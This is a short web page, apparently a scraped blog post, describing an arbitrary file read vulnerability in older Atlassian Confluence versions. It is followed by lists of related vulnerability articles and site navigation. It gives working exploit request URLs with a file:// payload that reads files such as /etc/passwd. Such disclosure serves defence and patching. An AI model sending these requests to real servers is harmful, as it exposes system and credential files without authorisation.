Atlassian Confluence Arbitrary File Read Vulnerability

Others 2022-04-22 20:25:07 views: 0

Atlassian Confluence

Atlassian Confluence is a set of professional enterprise knowledge management and collaboration software from Atlassian Company in Australia, which can also be used to build enterprise WiKi. The software enables collaboration and knowledge sharing among team members.

Vulnerability Introduction

Vulnerability Name: Arbitrary File Read

Vulnerability type: WEB type vulnerability

Affected Versions: Less than or equal to version 5.8.17

Vulnerability Rating: High Critical

Vulnerability Details

Vulnerability request:

https://hostdomain/spaces/viewdefaultdecorator.action?decoratorName=PAYLOAD

https://hostdomain/admin/viewdefaultdecorator.action?decoratorName=PAYLOAD

PAYLOAD => file:///d:/xxx/xxx or file:////etc/passwd

Guess you like

Origin http://43.154.161.224:23101/article/api/json?id=325253889&siteId=291194637

Atlassian Confluence Arbitrary File Read Vulnerability

CVE-2019-4505: WebSphere arbitrary file read vulnerability alerts

CVE-2021-3019 [Reproduction of Lanproxy arbitrary file read vulnerability]

Grafana Arbitrary File Read Vulnerability (CVE-2021-43798)

CVE-2021-43798 Grafana Unauthorized Arbitrary File Read Vulnerability

Chanjet TPlus DownloadProxy.aspx has an arbitrary file read vulnerability

Arbitrary File Download Vulnerability

[High Risk] Atlassian Confluence Remote Code Execution Vulnerability

Arbitrary file reading and vulnerability reproduction

Arbitrary file upload vulnerability (introduction)

CVE-2019-11510 Pulse Connect Secure (PCS) SSL VP.N arbitrary file read vulnerability

CISCO ASA device arbitrary file read vulnerability reproduction (CVE-2020-3452)

Spring Cloud Environment: CVE-2022-25401 (arbitrary file read vulnerability)

Apache Druid LoadData Arbitrary File Read Vulnerability CVE-2021-36749

UFIDA U8+CRM Arbitrary File Upload + Read Vulnerability Reappearance (HW0day)

Kingdee Cloud Xingkong arbitrary file read vulnerability recurrence (0day)

[Medium Risk] Apache Airflow Drill Provider < 2.4.3 has an arbitrary file read vulnerability

OSCS Open Source Security Weekly Issue 56: Apache Airflow Spark Provider Arbitrary File Read Vulnerability

[High Risk] Apache Airflow Spark Provider Arbitrary File Read Vulnerability (CVE-2023-40272)

Arbitrary file read and delete vulnerabilities

Penetration testing-arbitrary file download vulnerability

UFIDA NC Arbitrary File Upload Vulnerability Reproduced

Arbitrary file upload vulnerability in UEditor .Net version

[Code Audit] Instance of Arbitrary File Deletion Vulnerability

Hongjing eHR Arbitrary File Upload Vulnerability

Arbitrary File Upload Vulnerability in SecGate 3600 Firewall

There is an arbitrary file reading vulnerability in Lanling OA

There is an arbitrary file reading vulnerability in zeroshell firewall

Arbitrary file reading vulnerability in a billing management system

Arbitrary file upload vulnerability mining (getshell)

Recommended

Face Wall Intelligence releases the Eurux-8x22B open source large model - it can be called the "science champion"

Kaiyuan Daily | Google supports Hongmeng to take over; open source Rabbit R1; Android phones supported by Docker; Microsoft’s anxiety and ambition; Haier Electric shuts down the open platform

Ranking

Jianzhi offer interview questions 68-II. The nearest common ancestor of a binary tree (recursive)

jQuery Mobile development 1-UI components

Summary of Kotlin function knowledge

[ZZ] The Naked Truth About Anisotropic Filtering

Diagnosis: record a recovery of abnormal CRASH storage caused the database to be unable to be opened normally

Redis introduction and Linux installation Redis

Experiment 2 Introduction to switches

glances open source command-line system monitoring tools introduced

Use of selector

vue3 handwriting a carousel picture

Daily

More

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)